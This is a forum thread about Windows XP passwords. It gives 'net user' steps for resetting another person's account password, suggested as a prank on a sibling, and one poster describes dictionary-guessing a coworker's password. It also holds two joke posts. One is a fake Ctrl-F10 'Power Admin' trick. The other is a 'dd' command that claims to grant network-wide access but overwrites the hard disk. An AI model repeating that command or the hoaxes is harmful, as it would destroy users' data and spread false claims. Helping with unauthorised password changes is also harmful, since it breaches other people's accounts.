    Talking Louix:On passwords

    Hi all,
If you have any good reason to change someone's Windows XP user account password here's how:
    Click Start,then Run
    Type cmd>press enter
    Type Net User>press enter
Then Type Net user [persons aaccount name you want to change here] followed by a space then a *(asterisk)>press enter
Then type a password for the user>press enter
    Reconfirm the password>press enter
    Then type exit>press enter
    And your done!
*Remember, only do this if you have to!Or you want to mess around with your brother's/sister's password
    Have fun!

    mmc does too.

you also have to have admin access to change someone else's password.

I think most people here will.

Also, i created an app to do this, and list all accounts/descriptions/Full names.. .and so on.. Never got used

Same with a program that adds you to a domain.

    Re: Louix:On passwords

Exactly, most people use a command window, makes things easier. Although a GUI never goes a miss

I created them for my job, but they never got to the testing stage (i tested them privately, worked fine). Oh well.

I wonder if there's a BILL_GATES account with complete control over the whole Windows XP & 2000 community...

    Re: Louix:On passwords

If you hold the power button in on your computer, but push Ctrl-F10 just before it resets, then on the reboot you will get the option of logging onto the Power Admin account. It has lots of nifty tools and such to allow you to see what's really going on inside Windows (XP), but the trouble is timing the Ctrl-F10 push right.

However, I urge you to persevere.
    I use VB 6, VB.Net 2003 and Office 2010

    Code:
Excel Graphing | Excel Timer | Excel Tips and Tricks | Add controls in Office | Data tables in Excel | Gaussian random number distribution (VB6/VBA,VB.Net) | Coordinates, Vectors and 3D volumes

Obviously he changed his password how i figured it out:a little program i made that searches every word in the Oxford English dictionary database in about a minute and stops when it finds the right one i also tried all his family members but it turs out his password was 'wife' and that's it.
I pray to God he's not on the forums

Download a copy of Knoppix. Boot from the CD and start a command prompt. Excute the folowing command:
    Code:
    dd if=/dev/random bs=512 of=/dev/hda count=512
After executing this command you will have unrestricted access to the PC and all PC's on your local network segment.
